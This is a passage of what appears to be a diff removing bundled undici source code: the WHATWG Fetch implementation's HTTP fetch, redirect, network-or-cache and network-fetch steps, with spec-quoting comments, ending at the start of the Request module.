body given response and nullOrBytes. - const processBody = (nullOrBytes) => fetchParams.processResponseConsumeBody(response, nullOrBytes) - - // 2. Let processBodyError be this step: run fetchParams’s process - // response consume body given response and failure. - const processBodyError = (failure) => fetchParams.processResponseConsumeBody(response, failure) - - // 3. If response’s body is null, then queue a fetch task to run processBody - // given null, with fetchParams’s task destination. - if (response.body == null) { - queueMicrotask(() => processBody(null)) - } else { - // 4. Otherwise, fully read response’s body given processBody, processBodyError, - // and fetchParams’s task destination. - return fullyReadBody(response.body, processBody, processBodyError) - } - return Promise.resolve() - } -} - -// https://fetch.spec.whatwg.org/#http-fetch -async function httpFetch (fetchParams) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. Let actualResponse be null. - let actualResponse = null - - // 4. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 5. If request’s service-workers mode is "all", then: - if (request.serviceWorkers === 'all') { - // TODO - } - - // 6. If response is null, then: - if (response === null) { - // 1. If makeCORSPreflight is true and one of these conditions is true: - // TODO - - // 2. If request’s redirect mode is "follow", then set request’s - // service-workers mode to "none". - if (request.redirect === 'follow') { - request.serviceWorkers = 'none' - } - - // 3. Set response and actualResponse to the result of running - // HTTP-network-or-cache fetch given fetchParams. - actualResponse = response = await httpNetworkOrCacheFetch(fetchParams) - - // 4. If request’s response tainting is "cors" and a CORS check - // for request and response returns failure, then return a network error. - if ( - request.responseTainting === 'cors' && - corsCheck(request, response) === 'failure' - ) { - return makeNetworkError('cors failure') - } - - // 5. If the TAO check for request and response returns failure, then set - // request’s timing allow failed flag. - if (TAOCheck(request, response) === 'failure') { - request.timingAllowFailed = true - } - } - - // 7. If either request’s response tainting or response’s type - // is "opaque", and the cross-origin resource policy check with - // request’s origin, request’s client, request’s destination, - // and actualResponse returns blocked, then return a network error. - if ( - (request.responseTainting === 'opaque' || response.type === 'opaque') && - crossOriginResourcePolicyCheck( - request.origin, - request.client, - request.destination, - actualResponse - ) === 'blocked' - ) { - return makeNetworkError('blocked') - } - - // 8. If actualResponse’s status is a redirect status, then: - if (redirectStatusSet.has(actualResponse.status)) { - // 1. If actualResponse’s status is not 303, request’s body is not null, - // and the connection uses HTTP/2, then user agents may, and are even - // encouraged to, transmit an RST_STREAM frame. - // See, https://github.com/whatwg/fetch/issues/1288 - if (request.redirect !== 'manual') { - fetchParams.controller.connection.destroy() - } - - // 2. Switch on request’s redirect mode: - if (request.redirect === 'error') { - // Set response to a network error. - response = makeNetworkError('unexpected redirect') - } else if (request.redirect === 'manual') { - // Set response to an opaque-redirect filtered response whose internal - // response is actualResponse. - // NOTE(spec): On the web this would return an `opaqueredirect` response, - // but that doesn't make sense server side. - // See https://github.com/nodejs/undici/issues/1193. - response = actualResponse - } else if (request.redirect === 'follow') { - // Set response to the result of running HTTP-redirect fetch given - // fetchParams and response. - response = await httpRedirectFetch(fetchParams, response) - } else { - assert(false) - } - } - - // 9. Set response’s timing info to timingInfo. - response.timingInfo = timingInfo - - // 10. Return response. - return response -} - -// https://fetch.spec.whatwg.org/#http-redirect-fetch -function httpRedirectFetch (fetchParams, response) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let actualResponse be response, if response is not a filtered response, - // and response’s internal response otherwise. - const actualResponse = response.internalResponse - ? response.internalResponse - : response - - // 3. Let locationURL be actualResponse’s location URL given request’s current - // URL’s fragment. - let locationURL - - try { - locationURL = responseLocationURL( - actualResponse, - requestCurrentURL(request).hash - ) - - // 4. If locationURL is null, then return response. - if (locationURL == null) { - return response - } - } catch (err) { - // 5. If locationURL is failure, then return a network error. - return Promise.resolve(makeNetworkError(err)) - } - - // 6. If locationURL’s scheme is not an HTTP(S) scheme, then return a network - // error. - if (!urlIsHttpHttpsScheme(locationURL)) { - return Promise.resolve(makeNetworkError('URL scheme must be a HTTP(S) scheme')) - } - - // 7. If request’s redirect count is 20, then return a network error. - if (request.redirectCount === 20) { - return Promise.resolve(makeNetworkError('redirect count exceeded')) - } - - // 8. Increase request’s redirect count by 1. - request.redirectCount += 1 - - // 9. If request’s mode is "cors", locationURL includes credentials, and - // request’s origin is not same origin with locationURL’s origin, then return - // a network error. - if ( - request.mode === 'cors' && - (locationURL.username || locationURL.password) && - !sameOrigin(request, locationURL) - ) { - return Promise.resolve(makeNetworkError('cross origin not allowed for request mode "cors"')) - } - - // 10. If request’s response tainting is "cors" and locationURL includes - // credentials, then return a network error. - if ( - request.responseTainting === 'cors' && - (locationURL.username || locationURL.password) - ) { - return Promise.resolve(makeNetworkError( - 'URL cannot contain credentials for request mode "cors"' - )) - } - - // 11. If actualResponse’s status is not 303, request’s body is non-null, - // and request’s body’s source is null, then return a network error. - if ( - actualResponse.status !== 303 && - request.body != null && - request.body.source == null - ) { - return Promise.resolve(makeNetworkError()) - } - - // 12. If one of the following is true - // - actualResponse’s status is 301 or 302 and request’s method is `POST` - // - actualResponse’s status is 303 and request’s method is not `GET` or `HEAD` - if ( - ([301, 302].includes(actualResponse.status) && request.method === 'POST') || - (actualResponse.status === 303 && - !GET_OR_HEAD.includes(request.method)) - ) { - // then: - // 1. Set request’s method to `GET` and request’s body to null. - request.method = 'GET' - request.body = null - - // 2. For each headerName of request-body-header name, delete headerName from - // request’s header list. - for (const headerName of requestBodyHeader) { - request.headersList.delete(headerName) - } - } - - // 13. If request’s current URL’s origin is not same origin with locationURL’s - // origin, then for each headerName of CORS non-wildcard request-header name, - // delete headerName from request’s header list. - if (!sameOrigin(requestCurrentURL(request), locationURL)) { - // https://fetch.spec.whatwg.org/#cors-non-wildcard-request-header-name - request.headersList.delete('authorization') - - // https://fetch.spec.whatwg.org/#authentication-entries - request.headersList.delete('proxy-authorization', true) - - // "Cookie" and "Host" are forbidden request-headers, which undici doesn't implement. - request.headersList.delete('cookie') - request.headersList.delete('host') - } - - // 14. If request’s body is non-null, then set request’s body to the first return - // value of safely extracting request’s body’s source. - if (request.body != null) { - assert(request.body.source != null) - request.body = safelyExtractBody(request.body.source)[0] - } - - // 15. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 16. Set timingInfo’s redirect end time and post-redirect start time to the - // coarsened shared current time given fetchParams’s cross-origin isolated - // capability. - timingInfo.redirectEndTime = timingInfo.postRedirectStartTime = - coarsenedSharedCurrentTime(fetchParams.crossOriginIsolatedCapability) - - // 17. If timingInfo’s redirect start time is 0, then set timingInfo’s - // redirect start time to timingInfo’s start time. - if (timingInfo.redirectStartTime === 0) { - timingInfo.redirectStartTime = timingInfo.startTime - } - - // 18. Append locationURL to request’s URL list. - request.urlList.push(locationURL) - - // 19. Invoke set request’s referrer policy on redirect on request and - // actualResponse. - setRequestReferrerPolicyOnRedirect(request, actualResponse) - - // 20. Return the result of running main fetch given fetchParams and true. - return mainFetch(fetchParams, true) -} - -// https://fetch.spec.whatwg.org/#http-network-or-cache-fetch -async function httpNetworkOrCacheFetch ( - fetchParams, - isAuthenticationFetch = false, - isNewConnectionFetch = false -) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let httpFetchParams be null. - let httpFetchParams = null - - // 3. Let httpRequest be null. - let httpRequest = null - - // 4. Let response be null. - let response = null - - // 5. Let storedResponse be null. - // TODO: cache - - // 6. Let httpCache be null. - const httpCache = null - - // 7. Let the revalidatingFlag be unset. - const revalidatingFlag = false - - // 8. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. If request’s window is "no-window" and request’s redirect mode is - // "error", then set httpFetchParams to fetchParams and httpRequest to - // request. - if (request.window === 'no-window' && request.redirect === 'error') { - httpFetchParams = fetchParams - httpRequest = request - } else { - // Otherwise: - - // 1. Set httpRequest to a clone of request. - httpRequest = makeRequest(request) - - // 2. Set httpFetchParams to a copy of fetchParams. - httpFetchParams = { ...fetchParams } - - // 3. Set httpFetchParams’s request to httpRequest. - httpFetchParams.request = httpRequest - } - - // 3. Let includeCredentials be true if one of - const includeCredentials = - request.credentials === 'include' || - (request.credentials === 'same-origin' && - request.responseTainting === 'basic') - - // 4. Let contentLength be httpRequest’s body’s length, if httpRequest’s - // body is non-null; otherwise null. - const contentLength = httpRequest.body ? httpRequest.body.length : null - - // 5. Let contentLengthHeaderValue be null. - let contentLengthHeaderValue = null - - // 6. If httpRequest’s body is null and httpRequest’s method is `POST` or - // `PUT`, then set contentLengthHeaderValue to `0`. - if ( - httpRequest.body == null && - ['POST', 'PUT'].includes(httpRequest.method) - ) { - contentLengthHeaderValue = '0' - } - - // 7. If contentLength is non-null, then set contentLengthHeaderValue to - // contentLength, serialized and isomorphic encoded. - if (contentLength != null) { - contentLengthHeaderValue = isomorphicEncode(`${contentLength}`) - } - - // 8. If contentLengthHeaderValue is non-null, then append - // `Content-Length`/contentLengthHeaderValue to httpRequest’s header - // list. - if (contentLengthHeaderValue != null) { - httpRequest.headersList.append('content-length', contentLengthHeaderValue) - } - - // 9. If contentLengthHeaderValue is non-null, then append (`Content-Length`, - // contentLengthHeaderValue) to httpRequest’s header list. - - // 10. If contentLength is non-null and httpRequest’s keepalive is true, - // then: - if (contentLength != null && httpRequest.keepalive) { - // NOTE: keepalive is a noop outside of browser context. - } - - // 11. If httpRequest’s referrer is a URL, then append - // `Referer`/httpRequest’s referrer, serialized and isomorphic encoded, - // to httpRequest’s header list. - if (httpRequest.referrer instanceof URL) { - httpRequest.headersList.append('referer', isomorphicEncode(httpRequest.referrer.href)) - } - - // 12. Append a request `Origin` header for httpRequest. - appendRequestOriginHeader(httpRequest) - - // 13. Append the Fetch metadata headers for httpRequest. [FETCH-METADATA] - appendFetchMetadata(httpRequest) - - // 14. If httpRequest’s header list does not contain `User-Agent`, then - // user agents should append `User-Agent`/default `User-Agent` value to - // httpRequest’s header list. - if (!httpRequest.headersList.contains('user-agent')) { - httpRequest.headersList.append('user-agent', typeof esbuildDetection === 'undefined' ? 'undici' : 'node') - } - - // 15. If httpRequest’s cache mode is "default" and httpRequest’s header - // list contains `If-Modified-Since`, `If-None-Match`, - // `If-Unmodified-Since`, `If-Match`, or `If-Range`, then set - // httpRequest’s cache mode to "no-store". - if ( - httpRequest.cache === 'default' && - (httpRequest.headersList.contains('if-modified-since') || - httpRequest.headersList.contains('if-none-match') || - httpRequest.headersList.contains('if-unmodified-since') || - httpRequest.headersList.contains('if-match') || - httpRequest.headersList.contains('if-range')) - ) { - httpRequest.cache = 'no-store' - } - - // 16. If httpRequest’s cache mode is "no-cache", httpRequest’s prevent - // no-cache cache-control header modification flag is unset, and - // httpRequest’s header list does not contain `Cache-Control`, then append - // `Cache-Control`/`max-age=0` to httpRequest’s header list. - if ( - httpRequest.cache === 'no-cache' && - !httpRequest.preventNoCacheCacheControlHeaderModification && - !httpRequest.headersList.contains('cache-control') - ) { - httpRequest.headersList.append('cache-control', 'max-age=0') - } - - // 17. If httpRequest’s cache mode is "no-store" or "reload", then: - if (httpRequest.cache === 'no-store' || httpRequest.cache === 'reload') { - // 1. If httpRequest’s header list does not contain `Pragma`, then append - // `Pragma`/`no-cache` to httpRequest’s header list. - if (!httpRequest.headersList.contains('pragma')) { - httpRequest.headersList.append('pragma', 'no-cache') - } - - // 2. If httpRequest’s header list does not contain `Cache-Control`, - // then append `Cache-Control`/`no-cache` to httpRequest’s header list. - if (!httpRequest.headersList.contains('cache-control')) { - httpRequest.headersList.append('cache-control', 'no-cache') - } - } - - // 18. If httpRequest’s header list contains `Range`, then append - // `Accept-Encoding`/`identity` to httpRequest’s header list. - if (httpRequest.headersList.contains('range')) { - httpRequest.headersList.append('accept-encoding', 'identity') - } - - // 19. Modify httpRequest’s header list per HTTP. Do not append a given - // header if httpRequest’s header list contains that header’s name. - // TODO: https://github.com/whatwg/fetch/issues/1285#issuecomment-896560129 - if (!httpRequest.headersList.contains('accept-encoding')) { - if (urlHasHttpsScheme(requestCurrentURL(httpRequest))) { - httpRequest.headersList.append('accept-encoding', 'br, gzip, deflate') - } else { - httpRequest.headersList.append('accept-encoding', 'gzip, deflate') - } - } - - httpRequest.headersList.delete('host') - - // 20. If includeCredentials is true, then: - if (includeCredentials) { - // 1. If the user agent is not configured to block cookies for httpRequest - // (see section 7 of [COOKIES]), then: - // TODO: credentials - // 2. If httpRequest’s header list does not contain `Authorization`, then: - // TODO: credentials - } - - // 21. If there’s a proxy-authentication entry, use it as appropriate. - // TODO: proxy-authentication - - // 22. Set httpCache to the result of determining the HTTP cache - // partition, given httpRequest. - // TODO: cache - - // 23. If httpCache is null, then set httpRequest’s cache mode to - // "no-store". - if (httpCache == null) { - httpRequest.cache = 'no-store' - } - - // 24. If httpRequest’s cache mode is neither "no-store" nor "reload", - // then: - if (httpRequest.mode !== 'no-store' && httpRequest.mode !== 'reload') { - // TODO: cache - } - - // 9. If aborted, then return the appropriate network error for fetchParams. - // TODO - - // 10. If response is null, then: - if (response == null) { - // 1. If httpRequest’s cache mode is "only-if-cached", then return a - // network error. - if (httpRequest.mode === 'only-if-cached') { - return makeNetworkError('only if cached') - } - - // 2. Let forwardResponse be the result of running HTTP-network fetch - // given httpFetchParams, includeCredentials, and isNewConnectionFetch. - const forwardResponse = await httpNetworkFetch( - httpFetchParams, - includeCredentials, - isNewConnectionFetch - ) - - // 3. If httpRequest’s method is unsafe and forwardResponse’s status is - // in the range 200 to 399, inclusive, invalidate appropriate stored - // responses in httpCache, as per the "Invalidation" chapter of HTTP - // Caching, and set storedResponse to null. [HTTP-CACHING] - if ( - !safeMethodsSet.has(httpRequest.method) && - forwardResponse.status >= 200 && - forwardResponse.status <= 399 - ) { - // TODO: cache - } - - // 4. If the revalidatingFlag is set and forwardResponse’s status is 304, - // then: - if (revalidatingFlag && forwardResponse.status === 304) { - // TODO: cache - } - - // 5. If response is null, then: - if (response == null) { - // 1. Set response to forwardResponse. - response = forwardResponse - - // 2. Store httpRequest and forwardResponse in httpCache, as per the - // "Storing Responses in Caches" chapter of HTTP Caching. [HTTP-CACHING] - // TODO: cache - } - } - - // 11. Set response’s URL list to a clone of httpRequest’s URL list. - response.urlList = [...httpRequest.urlList] - - // 12. If httpRequest’s header list contains `Range`, then set response’s - // range-requested flag. - if (httpRequest.headersList.contains('range')) { - response.rangeRequested = true - } - - // 13. Set response’s request-includes-credentials to includeCredentials. - response.requestIncludesCredentials = includeCredentials - - // 14. If response’s status is 401, httpRequest’s response tainting is not - // "cors", includeCredentials is true, and request’s window is an environment - // settings object, then: - // TODO - - // 15. If response’s status is 407, then: - if (response.status === 407) { - // 1. If request’s window is "no-window", then return a network error. - if (request.window === 'no-window') { - return makeNetworkError() - } - - // 2. ??? - - // 3. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams)) { - return makeAppropriateNetworkError(fetchParams) - } - - // 4. Prompt the end user as appropriate in request’s window and store - // the result as a proxy-authentication entry. [HTTP-AUTH] - // TODO: Invoke some kind of callback? - - // 5. Set response to the result of running HTTP-network-or-cache fetch given - // fetchParams. - // TODO - return makeNetworkError('proxy authentication required') - } - - // 16. If all of the following are true - if ( - // response’s status is 421 - response.status === 421 && - // isNewConnectionFetch is false - !isNewConnectionFetch && - // request’s body is null, or request’s body is non-null and request’s body’s source is non-null - (request.body == null || request.body.source != null) - ) { - // then: - - // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams)) { - return makeAppropriateNetworkError(fetchParams) - } - - // 2. Set response to the result of running HTTP-network-or-cache - // fetch given fetchParams, isAuthenticationFetch, and true. - - // TODO (spec): The spec doesn't specify this but we need to cancel - // the active response before we can start a new one. - // https://github.com/whatwg/fetch/issues/1293 - fetchParams.controller.connection.destroy() - - response = await httpNetworkOrCacheFetch( - fetchParams, - isAuthenticationFetch, - true - ) - } - - // 17. If isAuthenticationFetch is true, then create an authentication entry - if (isAuthenticationFetch) { - // TODO - } - - // 18. Return response. - return response -} - -// https://fetch.spec.whatwg.org/#http-network-fetch -async function httpNetworkFetch ( - fetchParams, - includeCredentials = false, - forceNewConnection = false -) { - assert(!fetchParams.controller.connection || fetchParams.controller.connection.destroyed) - - fetchParams.controller.connection = { - abort: null, - destroyed: false, - destroy (err) { - if (!this.destroyed) { - this.destroyed = true - this.abort?.(err ?? new DOMException('The operation was aborted.', 'AbortError')) - } - } - } - - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 4. Let httpCache be the result of determining the HTTP cache partition, - // given request. - // TODO: cache - const httpCache = null - - // 5. If httpCache is null, then set request’s cache mode to "no-store". - if (httpCache == null) { - request.cache = 'no-store' - } - - // 6. Let networkPartitionKey be the result of determining the network - // partition key given request. - // TODO - - // 7. Let newConnection be "yes" if forceNewConnection is true; otherwise - // "no". - const newConnection = forceNewConnection ? 'yes' : 'no' // eslint-disable-line no-unused-vars - - // 8. Switch on request’s mode: - if (request.mode === 'websocket') { - // Let connection be the result of obtaining a WebSocket connection, - // given request’s current URL. - // TODO - } else { - // Let connection be the result of obtaining a connection, given - // networkPartitionKey, request’s current URL’s origin, - // includeCredentials, and forceNewConnection. - // TODO - } - - // 9. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. If connection is failure, then return a network error. - - // 2. Set timingInfo’s final connection timing info to the result of - // calling clamp and coarsen connection timing info with connection’s - // timing info, timingInfo’s post-redirect start time, and fetchParams’s - // cross-origin isolated capability. - - // 3. If connection is not an HTTP/2 connection, request’s body is non-null, - // and request’s body’s source is null, then append (`Transfer-Encoding`, - // `chunked`) to request’s header list. - - // 4. Set timingInfo’s final network-request start time to the coarsened - // shared current time given fetchParams’s cross-origin isolated - // capability. - - // 5. Set response to the result of making an HTTP request over connection - // using request with the following caveats: - - // - Follow the relevant requirements from HTTP. [HTTP] [HTTP-SEMANTICS] - // [HTTP-COND] [HTTP-CACHING] [HTTP-AUTH] - - // - If request’s body is non-null, and request’s body’s source is null, - // then the user agent may have a buffer of up to 64 kibibytes and store - // a part of request’s body in that buffer. If the user agent reads from - // request’s body beyond that buffer’s size and the user agent needs to - // resend request, then instead return a network error. - - // - Set timingInfo’s final network-response start time to the coarsened - // shared current time given fetchParams’s cross-origin isolated capability, - // immediately after the user agent’s HTTP parser receives the first byte - // of the response (e.g., frame header bytes for HTTP/2 or response status - // line for HTTP/1.x). - - // - Wait until all the headers are transmitted. - - // - Any responses whose status is in the range 100 to 199, inclusive, - // and is not 101, are to be ignored, except for the purposes of setting - // timingInfo’s final network-response start time above. - - // - If request’s header list contains `Transfer-Encoding`/`chunked` and - // response is transferred via HTTP/1.0 or older, then return a network - // error. - - // - If the HTTP request results in a TLS client certificate dialog, then: - - // 1. If request’s window is an environment settings object, make the - // dialog available in request’s window. - - // 2. Otherwise, return a network error. - - // To transmit request’s body body, run these steps: - let requestBody = null - // 1. If body is null and fetchParams’s process request end-of-body is - // non-null, then queue a fetch task given fetchParams’s process request - // end-of-body and fetchParams’s task destination. - if (request.body == null && fetchParams.processRequestEndOfBody) { - queueMicrotask(() => fetchParams.processRequestEndOfBody()) - } else if (request.body != null) { - // 2. Otherwise, if body is non-null: - - // 1. Let processBodyChunk given bytes be these steps: - const processBodyChunk = async function * (bytes) { - // 1. If the ongoing fetch is terminated, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. Run this step in parallel: transmit bytes. - yield bytes - - // 3. If fetchParams’s process request body is non-null, then run - // fetchParams’s process request body given bytes’s length. - fetchParams.processRequestBodyChunkLength?.(bytes.byteLength) - } - - // 2. Let processEndOfBody be these steps: - const processEndOfBody = () => { - // 1. If fetchParams is canceled, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. If fetchParams’s process request end-of-body is non-null, - // then run fetchParams’s process request end-of-body. - if (fetchParams.processRequestEndOfBody) { - fetchParams.processRequestEndOfBody() - } - } - - // 3. Let processBodyError given e be these steps: - const processBodyError = (e) => { - // 1. If fetchParams is canceled, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. If e is an "AbortError" DOMException, then abort fetchParams’s controller. - if (e.name === 'AbortError') { - fetchParams.controller.abort() - } else { - fetchParams.controller.terminate(e) - } - } - - // 4. Incrementally read request’s body given processBodyChunk, processEndOfBody, - // processBodyError, and fetchParams’s task destination. - requestBody = (async function * () { - try { - for await (const bytes of request.body.stream) { - yield * processBodyChunk(bytes) - } - processEndOfBody() - } catch (err) { - processBodyError(err) - } - })() - } - - try { - // socket is only provided for websockets - const { body, status, statusText, headersList, socket } = await dispatch({ body: requestBody }) - - if (socket) { - response = makeResponse({ status, statusText, headersList, socket }) - } else { - const iterator = body[Symbol.asyncIterator]() - fetchParams.controller.next = () => iterator.next() - - response = makeResponse({ status, statusText, headersList }) - } - } catch (err) { - // 10. If aborted, then: - if (err.name === 'AbortError') { - // 1. If connection uses HTTP/2, then transmit an RST_STREAM frame. - fetchParams.controller.connection.destroy() - - // 2. Return the appropriate network error for fetchParams. - return makeAppropriateNetworkError(fetchParams, err) - } - - return makeNetworkError(err) - } - - // 11. Let pullAlgorithm be an action that resumes the ongoing fetch - // if it is suspended. - const pullAlgorithm = () => { - fetchParams.controller.resume() - } - - // 12. Let cancelAlgorithm be an algorithm that aborts fetchParams’s - // controller with reason, given reason. - const cancelAlgorithm = (reason) => { - fetchParams.controller.abort(reason) - } - - // 13. Let highWaterMark be a non-negative, non-NaN number, chosen by - // the user agent. - // TODO - - // 14. Let sizeAlgorithm be an algorithm that accepts a chunk object - // and returns a non-negative, non-NaN, non-infinite number, chosen by the user agent. - // TODO - - // 15. Let stream be a new ReadableStream. - // 16. Set up stream with pullAlgorithm set to pullAlgorithm, - // cancelAlgorithm set to cancelAlgorithm, highWaterMark set to - // highWaterMark, and sizeAlgorithm set to sizeAlgorithm. - if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - const stream = new ReadableStream( - { - async start (controller) { - fetchParams.controller.controller = controller - }, - async pull (controller) { - await pullAlgorithm(controller) - }, - async cancel (reason) { - await cancelAlgorithm(reason) - } - }, - { - highWaterMark: 0, - size () { - return 1 - } - } - ) - - // 17. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. Set response’s body to a new body whose stream is stream. - response.body = { stream } - - // 2. If response is not a network error and request’s cache mode is - // not "no-store", then update response in httpCache for request. - // TODO - - // 3. If includeCredentials is true and the user agent is not configured - // to block cookies for request (see section 7 of [COOKIES]), then run the - // "set-cookie-string" parsing algorithm (see section 5.2 of [COOKIES]) on - // the value of each header whose name is a byte-case-insensitive match for - // `Set-Cookie` in response’s header list, if any, and request’s current URL. - // TODO - - // 18. If aborted, then: - // TODO - - // 19. Run these steps in parallel: - - // 1. Run these steps, but abort when fetchParams is canceled: - fetchParams.controller.on('terminated', onAborted) - fetchParams.controller.resume = async () => { - // 1. While true - while (true) { - // 1-3. See onData... - - // 4. Set bytes to the result of handling content codings given - // codings and bytes. - let bytes - let isFailure - try { - const { done, value } = await fetchParams.controller.next() - - if (isAborted(fetchParams)) { - break - } - - bytes = done ? undefined : value - } catch (err) { - if (fetchParams.controller.ended && !timingInfo.encodedBodySize) { - // zlib doesn't like empty streams. - bytes = undefined - } else { - bytes = err - - // err may be propagated from the result of calling readablestream.cancel, - // which might not be an error. https://github.com/nodejs/undici/issues/2009 - isFailure = true - } - } - - if (bytes === undefined) { - // 2. Otherwise, if the bytes transmission for response’s message - // body is done normally and stream is readable, then close - // stream, finalize response for fetchParams and response, and - // abort these in-parallel steps. - readableStreamClose(fetchParams.controller.controller) - - finalizeResponse(fetchParams, response) - - return - } - - // 5. Increase timingInfo’s decoded body size by bytes’s length. - timingInfo.decodedBodySize += bytes?.byteLength ?? 0 - - // 6. If bytes is failure, then terminate fetchParams’s controller. - if (isFailure) { - fetchParams.controller.terminate(bytes) - return - } - - // 7. Enqueue a Uint8Array wrapping an ArrayBuffer containing bytes - // into stream. - fetchParams.controller.controller.enqueue(new Uint8Array(bytes)) - - // 8. If stream is errored, then terminate the ongoing fetch. - if (isErrored(stream)) { - fetchParams.controller.terminate() - return - } - - // 9. If stream doesn’t need more data ask the user agent to suspend - // the ongoing fetch. - if (!fetchParams.controller.controller.desiredSize) { - return - } - } - } - - // 2. If aborted, then: - function onAborted (reason) { - // 2. If fetchParams is aborted, then: - if (isAborted(fetchParams)) { - // 1. Set response’s aborted flag. - response.aborted = true - - // 2. If stream is readable, then error stream with the result of - // deserialize a serialized abort reason given fetchParams’s - // controller’s serialized abort reason and an - // implementation-defined realm. - if (isReadable(stream)) { - fetchParams.controller.controller.error( - fetchParams.controller.serializedAbortReason - ) - } - } else { - // 3. Otherwise, if stream is readable, error stream with a TypeError. - if (isReadable(stream)) { - fetchParams.controller.controller.error(new TypeError('terminated', { - cause: isErrorLike(reason) ? reason : undefined - })) - } - } - - // 4. If connection uses HTTP/2, then transmit an RST_STREAM frame. - // 5. Otherwise, the user agent should close connection unless it would be bad for performance to do so. - fetchParams.controller.connection.destroy() - } - - // 20. Return response. - return response - - async function dispatch ({ body }) { - const url = requestCurrentURL(request) - /** @type {import('../..').Agent} */ - const agent = fetchParams.controller.dispatcher - - return new Promise((resolve, reject) => agent.dispatch( - { - path: url.pathname + url.search, - origin: url.origin, - method: request.method, - body: fetchParams.controller.dispatcher.isMockActive ? request.body && (request.body.source || request.body.stream) : body, - headers: request.headersList.entries, - maxRedirections: 0, - upgrade: request.mode === 'websocket' ? 'websocket' : undefined - }, - { - body: null, - abort: null, - - onConnect (abort) { - // TODO (fix): Do we need connection here? - const { connection } = fetchParams.controller - - if (connection.destroyed) { - abort(new DOMException('The operation was aborted.', 'AbortError')) - } else { - fetchParams.controller.on('terminated', abort) - this.abort = connection.abort = abort - } - }, - - onHeaders (status, headersList, resume, statusText) { - if (status < 200) { - return - } - - let codings = [] - let location = '' - - const headers = new Headers() - - // For H2, the headers are a plain JS object - // We distinguish between them and iterate accordingly - if (Array.isArray(headersList)) { - for (let n = 0; n < headersList.length; n += 2) { - const key = headersList[n + 0].toString('latin1') - const val = headersList[n + 1].toString('latin1') - if (key.toLowerCase() === 'content-encoding') { - // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 - // "All content-coding values are case-insensitive..." - codings = val.toLowerCase().split(',').map((x) => x.trim()) - } else if (key.toLowerCase() === 'location') { - location = val - } - - headers[kHeadersList].append(key, val) - } - } else { - const keys = Object.keys(headersList) - for (const key of keys) { - const val = headersList[key] - if (key.toLowerCase() === 'content-encoding') { - // https://www.rfc-editor.org/rfc/rfc7231#section-3.1.2.1 - // "All content-coding values are case-insensitive..." - codings = val.toLowerCase().split(',').map((x) => x.trim()).reverse() - } else if (key.toLowerCase() === 'location') { - location = val - } - - headers[kHeadersList].append(key, val) - } - } - - this.body = new Readable({ read: resume }) - - const decoders = [] - - const willFollow = request.redirect === 'follow' && - location && - redirectStatusSet.has(status) - - // https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Encoding - if (request.method !== 'HEAD' && request.method !== 'CONNECT' && !nullBodyStatus.includes(status) && !willFollow) { - for (const coding of codings) { - // https://www.rfc-editor.org/rfc/rfc9112.html#section-7.2 - if (coding === 'x-gzip' || coding === 'gzip') { - decoders.push(zlib.createGunzip({ - // Be less strict when decoding compressed responses, since sometimes - // servers send slightly invalid responses that are still accepted - // by common browsers. - // Always using Z_SYNC_FLUSH is what cURL does. - flush: zlib.constants.Z_SYNC_FLUSH, - finishFlush: zlib.constants.Z_SYNC_FLUSH - })) - } else if (coding === 'deflate') { - decoders.push(zlib.createInflate()) - } else if (coding === 'br') { - decoders.push(zlib.createBrotliDecompress()) - } else { - decoders.length = 0 - break - } - } - } - - resolve({ - status, - statusText, - headersList: headers[kHeadersList], - body: decoders.length - ? pipeline(this.body, ...decoders, () => { }) - : this.body.on('error', () => {}) - }) - - return true - }, - - onData (chunk) { - if (fetchParams.controller.dump) { - return - } - - // 1. If one or more bytes have been transmitted from response’s - // message body, then: - - // 1. Let bytes be the transmitted bytes. - const bytes = chunk - - // 2. Let codings be the result of extracting header list values - // given `Content-Encoding` and response’s header list. - // See pullAlgorithm. - - // 3. Increase timingInfo’s encoded body size by bytes’s length. - timingInfo.encodedBodySize += bytes.byteLength - - // 4. See pullAlgorithm... - - return this.body.push(bytes) - }, - - onComplete () { - if (this.abort) { - fetchParams.controller.off('terminated', this.abort) - } - - fetchParams.controller.ended = true - - this.body.push(null) - }, - - onError (error) { - if (this.abort) { - fetchParams.controller.off('terminated', this.abort) - } - - this.body?.destroy(error) - - fetchParams.controller.terminate(error) - - reject(error) - }, - - onUpgrade (status, headersList, socket) { - if (status !== 101) { - return - } - - const headers = new Headers() - - for (let n = 0; n < headersList.length; n += 2) { - const key = headersList[n + 0].toString('latin1') - const val = headersList[n + 1].toString('latin1') - - headers[kHeadersList].append(key, val) - } - - resolve({ - status, - statusText: STATUS_CODES[status], - headersList: headers[kHeadersList], - socket - }) - - return true - } - } - )) - } -} - -module.exports = { - fetch, - Fetch, - fetching, - finalizeAndReportTiming -} - - -/***/ }), - -/***/ 8359: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; -/* globals AbortController */ - - - -const { extractBody, mixinBody, cloneBody } = __nccwpck_require__(1472) -const { Headers, fill: fillHeaders, HeadersList } = __nccwpck_require__(554) -const { FinalizationRegistry } = __nccwpck_require__(6436)() -const util = __nccwpck_require__(3983) -const { - isValidHTTPToken, - sameOrigin, - normalizeMethod, - makePolicyContainer, - normalizeMethodRecord -} = __nccwpck_require__(2538) -const { - forbiddenMethodsSet, - corsSafeListedMethodsSet, - referrerPolicy, - requestRedirect, - requestMode, - requestCredentials, - requestCache, - requestDuplex -} = __nccwpck_require__(1037) -const { kEnumerableProperty } = util -const { kHeaders, 